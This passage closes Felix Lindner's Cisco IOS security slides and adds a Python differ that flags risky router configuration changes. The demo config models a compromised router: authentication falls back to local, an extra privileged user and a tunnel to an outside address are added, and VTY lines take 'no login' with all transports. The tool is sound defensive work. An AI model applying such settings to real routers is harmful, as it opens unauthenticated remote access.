  - For corporate networks, configure core dumping to a central FTP server
  - Check the http://cir.recurity-labs.com wiki for more

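As an added example (not from the slides and not RANCID's code): a RANCID-style differ over two saved IOS configs that reports the kinds of change the shellcode slides describe as visible in the configuration: new or changed VTY lines, AAA and login changes, new tunnel interfaces, new local users and ACL changes. Changes are compared per section so that a `no login` under a new `line vty 5 15` is reported with its section, which a plain line diff loses. Both configs and the watch list are constructed for the demo.

```python
"""Section-aware IOS config differ with a watch list (added example, not RANCID)."""
import re
from typing import Dict, List, Tuple

# (label, pattern) pairs, tried in order against the section header and then the line
WATCH = [
    ("vty",    re.compile(r"^line vty ")),
    ("aaa",    re.compile(r"^(no )?(aaa |enable (secret|password))")),
    ("login",  re.compile(r"^(no )?(login|password|transport input)")),
    ("tunnel", re.compile(r"^interface Tunnel")),
    ("user",   re.compile(r"^username ")),
    ("acl",    re.compile(r"^(no )?(ip |ipv6 )?(access-(list|group|class)|traffic-filter)")),
]


def parse_config(config: str) -> Dict[str, List[str]]:
    """Map every top-level line to its indented body (empty for plain lines)."""
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in config.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        if raw.startswith(" ") and current is not None:
            sections[current].append(raw.strip())
        else:
            current = raw.strip()
            sections.setdefault(current, [])
    return sections


def diff_configs(old: str, new: str) -> List[Tuple[str, str, str]]:
    """(sign, header, line) triples; line is '' for a whole added or removed header."""
    a, b = parse_config(old), parse_config(new)
    changes: List[Tuple[str, str, str]] = []
    for header in sorted(set(a) | set(b)):
        if header not in a:
            changes.append(("+", header, ""))
            changes.extend(("+", header, l) for l in b[header])
        elif header not in b:
            changes.append(("-", header, ""))
            changes.extend(("-", header, l) for l in a[header])
        else:
            changes.extend(("+", header, l) for l in b[header] if l not in a[header])
            changes.extend(("-", header, l) for l in a[header] if l not in b[header])
    return changes


def review(old: str, new: str) -> List[str]:
    """Render only the changes that hit the watch list, each with its section."""
    alerts: List[str] = []
    for sign, header, line in diff_configs(old, new):
        for label, rx in WATCH:
            if rx.search(header) or (line and rx.search(line)):
                where = header + (" > " + line if line else "")
                alerts.append("%s [%s] %s" % (sign, label, where))
                break
    return alerts


# constructed sample: yesterday's config and today's
OLD_CONFIG = """\
aaa new-model
aaa authentication login default group tacacs+ local
username admin privilege 15 secret <removed>
!
interface FastEthernet0/0
 ip address 198.51.100.1 255.255.255.0
!
line vty 0 4
 access-class MGMT in
 transport input ssh
"""

NEW_CONFIG = """\
aaa new-model
aaa authentication login default local
username admin privilege 15 secret <removed>
username svc privilege 15 secret <removed>
!
interface FastEthernet0/0
 ip address 198.51.100.1 255.255.255.0
!
interface Tunnel0
 ip unnumbered FastEthernet0/0
 tunnel source FastEthernet0/0
 tunnel destination 203.0.113.9
!
line vty 0 4
 access-class MGMT in
 transport input ssh
!
line vty 5 15
 no login
 transport input all
"""

if __name__ == "__main__":
    for alert in review(OLD_CONFIG, NEW_CONFIG):
        print(alert)
```

On the sample the report shows the authentication fallback from TACACS+ to local, the new local user, the new tunnel with its endpoint, and the new VTY range without login and with all transports, which is exactly the set a shift engineer would want to see before anything else in the nightly diff.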
Complain to Cisco
- Nobody updates IOS and it is entirely Cisco's fault
  - New IOS versions interpret configurations differently
  - New IOS versions have different defaults
  - Not even Cisco engineers know which
  - Nobody can update a network if the result would be massive downtimes and outages
- Decent network engineers run 12.2
  - Brave network engineers run 12.3
  - VoIPioneers run 12.4 (and fail)
- Make Cisco provide clear upgrade paths
  - Guarantee that 12.2(13)T17 Telco -> 12.4(9)T6 Telco actually works
  - Provide tools for automatic configuration adjustment
- Cisco, Do Your Job!

Complain to Juniper, Huawei, …
- The lack of security advisories for the other big router vendors can only mean:
  1. Their stuff is perfectly secure
  2. Their stuff gets fixed silently
  3. Their stuff doesn't even get internal security testing
- While silently fixing security bugs is a trend (thanks Linus!), it's not acceptable for infrastructure equipment
- Cisco is actually doing a better job than everyone else in the networking industry when it comes to product security. PSIRT FTW!

Thank you!

Felix 'FX' Lindner
Head
fx@recurity-labs.com
Recurity Labs GmbH, Berlin, Germany
http://www.recurity-labs.com